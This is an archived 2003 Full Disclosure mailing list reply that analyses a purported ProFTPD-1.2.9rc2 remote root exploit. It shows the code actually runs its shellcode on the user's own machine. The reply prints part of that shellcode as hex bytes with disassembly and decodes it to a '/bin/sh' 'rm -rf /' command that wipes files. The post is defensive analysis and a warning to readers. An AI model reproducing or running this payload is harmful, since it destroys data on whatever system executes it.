Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ProFTPD-1.2.9rc2 remote root exploit

From: Philipp Buehler <pb+full-disclosure () mlsub buehler net>
Date: Fri, 24 Oct 2003 17:34:53 +0200
On 24/10/2003, GARCIA Lionel <lionel.garcia () airbus com> wrote To full-disclosure () lists netsys com:

--->   void(*sleep)()=(void*)sc;sleep(5);   <------- Hummm :-\


obscure the obvious :)


The shellcode seems to be locally launched. Anybody to "decrypt" the
shellcode ?


Well, not "fully", since this already gives enough clues:
\x31\xc0                xorl %eax,%eax
\x50                    pushl %eax
\x68\x66\x20\x2f\x58    pushl $0x66202f58 !"f /X"
\x68\x6d\x20\x2d\x72    pushl $0x6d202d72 !"m -r"
\x68\x2d\x63\x58\x72    pushl $0x2d635872 !"rcXr"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141 !"AAAA"
\x68\x2f\x73\x68\x43    pushl $0x2f736843 !"/shC"
\x68\x2f\x62\x69\x6e    pushl $0x2f62696e !"/bin"
\x31\xc0                xorl %eax,%eax

Then some "creative hopping" to connect this to an "/bin/sh rm -rf /"

If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>


'LOVE' in the air ... :)

ciao
-- 
Philipp Buehler, aka fips | <double-p>

When the horse dies, get off.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: